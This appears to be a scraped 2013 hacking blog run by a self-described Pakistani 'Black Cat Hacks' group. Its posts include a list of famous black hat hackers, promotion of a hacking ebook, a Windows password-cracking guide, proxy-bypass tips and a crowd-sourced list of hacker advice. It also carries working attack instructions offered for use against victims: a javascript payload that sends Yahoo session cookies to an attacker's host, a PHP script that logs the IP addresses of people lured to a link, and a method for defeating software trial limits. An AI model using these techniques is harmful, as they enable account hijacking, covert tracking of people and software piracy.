Blog Hijau

BLACK CAT HACKS ORGANIZATION

BLACK CAT ORGANIZATION was built in 2006,with 2 hackers and now we have more than 2000 Hackers and Crackers.

WE ARE ANNONYMOUS

BLACK CAT HACKS ORGANIZATION is annonymous for all over the world.We are annonymous..

WE ARE HACKERS AND CRACKERS

In our Organization,many hackers are work for us.We also have lot of Crackers who crack sites,softwares and much more...

MISSION

We are PAKISTANIES and work against enimies of Pakistan.

RANKS

COMMAND > Diamond Lion > Gold Lion > Silver Lion > 8* > 7* > 6* > 5* > 4* > 3* > 2* > 1* > 3 Dot > 2 Dot > 1 Dot > Begginer

Friday, 20 December 2013

Top 6 Black Hat Hackers In The World

There are two types of hackers. First one are good hackers who are known as "white hat" hackers and another one which we will be talking about today are called "black hat" hackers. In this article, we will be talking about six famous black hat hackers and their hacks which made them famous or wanted.

George Hotz

Young and talented and what is the most important bored teenager, George Hotz wanted to have fun one summer night and  as a result he hacked the Sony�s company Iphone. It happened in June of 2007, by that time George was 17. It was a bit of a challenge, because how to hack device with assistant things?  The secret is to figure out how �to speak to the device�.He also mentioned that what he did was completely legal.It seems people can be dangerous in certain way when they are bored. Who knows what may happen if crazy smart geek will find thy way of his ideas.

Kevin Mitnick                                                            

Kevin Mitnick is well-known as the most-wanted computer criminal in the United States. He was in high school when he started hacking. For several years he hacked dozens of companies.What interesting, for those �services� he was finally arrested in 1995 at his apartment for hacking. Kevin also has served 5 years in prison, nevertheless despite of his experience he runs his own security firm named Mitnick Security Consulting. The other side of the coin is, however Mitnick published a book that calls �Ghost in Wires�, which is about his upps-and-downs, victories and crushes. He shared that every hack was like a climbing to mountain and he reached the Everest. This is one more proof how talent have pined, because of a boredom.

Adrian Lamo

Adrian was called as the most effective and controversial hacker of the 21st century. That is very flattering status.He was famous for breaking into several high-profile computer networks. Lamo might use his gift to help people to consult, what is actually he did, but as exception and compromise.His baby steps in hacking, Adrian Lamo made pretty early and became known for the first time for operating AOL watchdog site.As many others, he was arrested in 2003 and had to correspond for each and every computer crime.Thus, even if Lamo now works as a threat analyst and public speaker, his glory will always follow him, because our past if the part of our �present�  and a part of who we are.

Gary McKinnon 

This �black hat� McKinnon  hacked into 97 United States military and NASA computers. He could be the biggest threat  for government. Glasgow-born McKinnon wanted the truth to come out and show itself. In March 2002 Gary was arrested by police. �Black hat� used his hacking skills to �research� his beliefs and evidence of UFOs  inexhaustible source of power, into the US government�s computers. He didn�t do that because of boredom, but because of obsession and thirst to hidden knowledge. Probably this computer crime is serious, but forgivable. Man wasn�t going to hack computer system because he was bored or to prove something, we was looking for truth no more than.

Jonathan James

Story of Jonathan James  is sad, nevertheless his life can be compared to comet � short, but bright. In 1999 teenager at the age of 15 years old hacked into Bellsouth and Miami-Dade school network. Jonathan James damaged NASA Systems, it costed $41,000 to fix the systems.  It goes without saying that he made serious damage. To stole software from NASA that worth $1.7 Million is one the biggest computer crimes. He wasn�t after information or justice, he was after money� As they say, never speak ill of the dead.Jonathan James was sentenced 6 months house arrest and banned from using computer, however that didn�t prevent him to commit suicide.

Kevin Poulsen

This talented �cyber-terrorists� could have great career and almost blow his chance.  It seems that this hacker likes contracts  and his life reflects it pretty well. He hacked into the US Department of Defense's Arpanet. However later  he worked as a consultant testing Pentagon computer security. Late on Kevin hacked  FBI, after that hacked phone lines to radio station  of Los Angeles� Poulsen�s life reminded American switchbacks�Certainly he was wanted by FRI  and finally they caught him. Despite of such interesting past, Kevin is law-abiding citizen and has several awards  of International Academy of Digital Arts and Sciences.

Paul Smith deals with paper writing services reviews. He is well-educated and many-sided specialists, which experts in modern technologies, devises, robotics and informatics. To reach Paul you can use

Wednesday, 11 December 2013

Hackbook Review - Beginner's Guide to Hacking with Tools

the hack book
The Hack Book is awesome eBook for beginners who wants to dive into the field of hacking. It contains guides to hacking tools and scripts along with underground hacking websites with awesome stuff. I would recommend this book if you are newbie in the field of hacking. You must check out Free Sample of this eBook by Clicking Here. Check out complete article to know more about this book.

Topics Covered In The Hack Book

  • Learn various Hacking Techniques.
  • Learn To Secure Your Computer From Various Hacking Attacks
  • Learn How to Tap Computers. (12+ Tools Included!)
  • How to use Malware's (30+ Tools Included!) and also Protect yourself against it.
  • Learn To Be Anonymous On The Internet
  • Few ways of Hacking Facebook, Yahoo and Email Accounts. (Scripts Included!)
  • Make Destructive Viruses. (2 Programs Included)
  • Network Hacking
  • Website Hacking.
  • Access to the latest Hacking Tools and Underground Communities.

Features

Non Technical Writing - First off, the writing. The writing isn't technical at start for the readers convenience. But the usage of technical words is important later on in the eBook is something you will find. The upside is that, he explained EVERY single technical keyword at some point of time in the eBook.

Hacking Tools � The best part about the eBook is that the author gives you a handful of POWERFUL hacking tools to kick start your hacking adventures. And unlike the other websites on the web, we give tools such as these : Learn How to Hack | Hacking eBook 

Coding -  Though coding isn�t required for implementing the whole of this eBook.Also,he doesn't teach you the whole of coding in the book (which is near impossible for any writer). He stressed well on the importance of learning coding after reading this book to become a successful and professional Hacker. The more coding you learn, the better you get at it.

Very Descriptive � The book has many pictures. As you can see for yourself in the sample book, you will see that he has given a thorough explanation with pictures for EXTREMELY easy understanding.

I would say this is a MUST READ for any budding hacker.


Sunday, 8 December 2013

Hacking Window 7 Password Using Ophcrack

In this tutorial i will teach you to hack Window 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.

What Is Ophcrack ?

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password.

How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

  1. Download Opcrack Live Cd by Clicking Here.
  2. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
  • Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
  • Windows XP: Click on ophcrack XP LiveCD.
  2. Now burn the live image on to the cd.
  3. Insert the disc into drive and restart you computer.
  4. If everything goes right you will see screen like below.
window7 password hacking

  5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
  6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
  7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word �empty�. This means that if the account is enabled you could log in without a password.
Windows 7 Password hacking
  8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
  9. Copy this hash value which is under NT Hash field.
 10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
 11. Type in the hash value you copied down in Step 9, Enter the captche and click on Crack Hashes.

More Hacking Tutorials

Friday, 6 December 2013

Hack Yahoo accounts with Session IDs or session cookies


"Hack Yahoo accounts with Session IDs or session cookies".



What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

How to Hack Softwares to use them Lifetime




Hi, I am back today with a most usefull article..Hope all of you will Like It ! Here i will show you that "How to Hack Softwares to use them Forever ?" . That really a useful article,because in our daily life we need thousand of softwares today,which of most are highly paid..So how to use them Freely for whole Like ??

Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.Because Purpose if ICA is 1st to clear your basics.So,When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.



NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate .
3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.

Thursday, 5 December 2013

How To Use Google As A Proxy ?


google proxy server
We often use schools and colleges internet connections, but they usually block access to undesired web sites (the "black list"). In order to access those sites you can do is use google translate as  proxy to bypass this restrictions. So lets get into it.

Method 1

1. Visit whatismyipaddress and note down you real Ip Address
2. Now Go to Google Translate
3. From Under Detect Language, Chose your language in my case English
4. Now type http://whatismyipaddress.com/  in text area and click on Translate
5. Now check your Ip Address, Its different from the real one.

Method 2

1. Go to link given below:
http://www.google.com/translate?langpair=es|en&u=www.mybloggersworld.com
2. Change www.mybloggersworld.com to website you like to visit.
3. Done!

If you use this trick, you are not sure to protect your privacy, this kind of connection lets you see blacklisted or banned pages but does not hide your IP address.

More Cool Tricks

Monday, 2 December 2013

How To Open Banned Websites WIth Proxy Sites ?

Open Banned Websites WIth Proxy Sites

There are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by  malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy server which is faster and trusted. Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open banned sites.

How To Open Banned Site ?

1. Open www.incloak.com in your browser.
You can also use any proxy site from list below
2. After that enter the URL of the site which you want to open like below.
Open Banned Websites WIth Proxy Sites
3. Now click the Hide Me button and enjoy.

More Cool Tricks

About Guest Blogger
Furqan Haider is a young blogger from Pakistan, Karachi. He loves to read articles about Blogging tips, Make Money and Technology. He is currently running his entertainment blog Online Fun Book

Tuesday, 26 November 2013

100 Ways To Become A Better Hacker




Well, The title is self explanatory. This post would not rely upon my input but it would rely upon your input, We will be gathering here 100 ways to become a better hacker. In other words 100 ways to improve your skills as a hacker.

Rules

1) Every person would get the credit for his submission.

2) The submissions needs to be precise and should be unique from what others have submitted so far.

3) Only the top 100 submissions would be entertained.

4) Once we are finished with accepting and publishing 100 submission, you can still submit your answers, What we would do then is overwrite the existing ones with the better ones.

5) Only submission via comments would be accepted.

100 ways to become a better hacker

1) Learning scripting languages such as PythonPerl and ruby can help you automate your tasks and for sure improve your skills.
 2) Understanding all possible user inputs is the fastest way to hack into the systems. 

3) 
When u gain access to an account or whatever u hacking in to, best practice do not alter anything. just monitor the activity and continue fetching information u need.

4)
 Travel and see different countries, it will make you better 
5)
 Never hesitate for usage of Google and other resources available i.e. exploit-db, and be updated with versions and bugs in each versions, for example, if I talk about WordPress, then one who is looking to hack WordPress website or pentest, then he should be well aware of at least 3.0+ versions updating, so whichever version is being used on the website, he should know the vulnerabilities in that and their exploitation 

6) RTFM, don't expect handouts. Educated questions, gets you educated answers
7) 
Move to Linux, learn Programming Languages CPearlLispJava and Html and write open source programs. Improve your functional English.
8) The most important factor for becoming a good hacker is, you must have your personal interest with computers. Additionally, you have to be definite in your work, such that you should take exactly interest in One thing at a single time. After covering the appropriate level of theory, the learner should try it practically as much as his satisfaction level. Watching Tutorials only for taking points, not really for following them from a to z exactly, because you have to be a good learner only if you have your personal intention for doing the things creatively. 
 9) One thing , Learn how old Hackers Started don't focus on new Programs like BACKTRACK , METASPLOIT , Learn Manual Hacking , Learn Coding and be patient ! Knowledge will come with time ! and practice all methods 

10) 
Do not rely on tricks for hacking. As they will keep you a script kiddie, get deep understanding about stuffs. And also don't rush from one topic to another. All those combined will make you a better hacker. "Slow and Steady wins the race"  


11) 
A support will always lift you up. Join groups, forums. Keep yourself updated with latest hacking news by reading blogs [Like this ;)], tweets etc. 

12) 
Understand what programming language to use at what moment. You're time is valuable so don't waste it writing something that could have been done faster! (and understand the difference between a scripting language and a programming language, python for example is a programming language.

13) During hacking remain mentally intact and focus on your each step. During a step always remember your next steps and the way you have to link them. Dont always use old methods and tricks, try new one and use your own mind too. and remember one thing that there is no shortcut of Hacking, to became a hacker, you have to give your whole passion to hacking. "Hacking is an Art, and Hacker is an Artist".  

14) 
This Attitude should be there within "SWEAT MORE IN PRACTISE, SO YOU BLEED LESS IN WAR" #defensive #offensive #B31212Y 

15) 
Whatever you're going to test,start it with a basic stuff. If you dont know any,start learning.


16)
 Enumeration is the key to pwnage, the more you enumerate the more attack surface you get

17) 
Be patient! Learn different protocols and read the RFCs to understand how they work and if there are some "security by design" issues. After that you should try to understand the context you're in and therefore develop an exploit for this particular context.

18) 
Sleep less, read more. Learn & Think & Try & Fail & Never give up. Remember, "...imagination will take you everywhere".

19) Don't compete anyone, never think you are the best, just compete "the you in the past". There will always be a vulnerability waiting for being discovered, by someone who thinks different. Understanding human logic makes things easier. "Hackers realize, kiddies memorize" ;) 
 20) Learn your own systems inside out, before moving on to other systems. The better you know your own, the more capable you will find yourself when it comes time to make your system work for you.

21) 
To be a good hacker, you need have good social engineering skills. Try to understand your victim's mentality, it will give you the ability to guess his/her confidential information 

22) 
A great person had said "if i had 8 hours to chop down a tree, I'd spend 6 hours sharpening my axe". Apply this on yourself. Prepare yourself! Learn programming, networking, scripting and all, be passionate, motivate yourself then start hacking with your own ideas...You will surely win

23) 
Use your inner power to became a great hacker. Just keep reading.. The more you read..the more you understand things behind the scene.

24) 
A startup now can be just a pair of 22 year old guys. A company like that can move much more easily than one with 10 people, half of whom have kids.

25) 
Think of all the psychic energy expended in seeking a fundamental distinction between "algorithm" and "program" 
 
26) 
If you don't have time to do it right, when will you have time to do it over?

27) 
Out in the field, any connection with home just makes you weaker. It reminds you that you were once civilized, soft; and that can get you killed faster than a bullet through the head
 

28) 
Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.

29) 
Be very careful. We suggest getting a book on HTML to avoid becoming a real legend in the hacker world. Putting up a web page before you know how to put up a web page is generally a very bad idea. The .gov sites are an exception.

30) 
We were addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses. 
 
31) 
To be a good hacker you have to learn from yourself. Learn from books like "The basics of ethical hacking and pen testing" and "The web app hackers handbook-Ed.2". Once you learnt these books i promise you will be able to hack systems as well as web apps.

32) Try to see, feel and possibly touch everything that you learn, only then you will be confident about your attacks/defenses.

33) 
Adopt the mindset of a hacker

34) 
You may not be there yet but with everyday practice you will be closer than yesterday. ~ Anonymous

35) Set of code has to be made by a hacker Don't get caught Learn the basic functionality of a system and network then explore their loop holes Every developer make mistake while developing identify the exploit and notify them to the develop 

36) 
Learn Russian. Every infosecurity geek should know Russian.

37)
 When you learn something in this field, always put it to good use .Defacing websites will not make you a better hacker, but, helping someone with their security might earn you a respect even higher than what a blackhat may get .

How to grab someone IP address ?

How to grab someone IP address ?

1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 

    <?php
    $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
    $img_number = imagecreate(400,95);
    $backcolor = imagecolorallocate($img_number,10,102,153);
    $textcolor = imagecolorallocate($img_number,255,255,255);

    imagefill($img_number,0,0,$backcolor);
    $number0 = " This is Your IP/Proxy";
    $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
    $number2 = " Host/Proxy: $hostname";
    $number4 = " _________________________________";

    Imagestring($img_number,10,5,5,$number0,$textcolor);
    Imagestring($img_number,10,5,25,$number1,$textcolor);
    Imagestring($img_number,10,5,45,$number2,$textcolor);
    Imagestring($img_number,10,5,50,$number4,$textcolor);
    Imagestring($img_number,10,8,50,$number4,$textcolor);
    Imagestring($img_number,10,5,10,$number4,$textcolor);
    Imagestring($img_number,10,8,10,$number4,$textcolor);

    header("Content-type: image/png");
    imagepng($img_number);
    $file=fopen("Name-here-to-protect-the-File.txt","a");
    $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
    fwrite($file, $file2);
    fclose($file);
    ?>


    2. Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .
    3. Now Upload Grab.php to your web hosting site.
    4. Copy the link of your  uploaded file and send it to victim.
    5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
    6. Enjoy you are Done !!